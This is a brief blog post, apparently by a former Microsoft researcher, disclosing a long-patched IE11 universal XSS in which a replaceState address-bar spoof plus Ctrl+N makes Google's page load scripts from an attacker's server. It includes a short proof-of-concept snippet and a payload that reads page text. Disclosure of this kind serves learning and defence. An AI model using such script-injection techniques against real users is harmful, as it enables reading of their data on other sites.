IE11 UXSS via replaceState Spoof and New Window

The history.replaceState address bar spoof had been patched for IE10, but it still worked on IE11. What made this variation more interesting is that it turned a simple spoof into a UXSS: after loading Google with an attacker-controlled URL still showing in the address bar, pressing Ctrl+N opens a new window that duplicates the current tab — but loads resources (including scripts) from the attacker’s domain rather than Google’s.

function main() {
    history.replaceState("", "", "redir.php");
    location.reload(); // Loads google.com but the address bar does not get refreshed.
}

// trick.js (loaded by the spoofed new window instead of Google's script)
alert(document.body.innerText);

Once redir.php redirects to Google and the address bar still shows the attacker’s URL, pressing Ctrl+N opens a new window whose HTML is a copy of Google’s page but whose relative script references resolve to the attacker’s server. Google loads a different random script name each time, so the server’s 404 handler can always serve trick.js regardless of the requested filename. User interaction (Ctrl+N) is required. Tested on Win7 IE11 build 20130227-2100.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [Popup Blocker Bypass via Nested ActiveX htmlFile] :: [Address Bar Spoof via prompt and document.write] >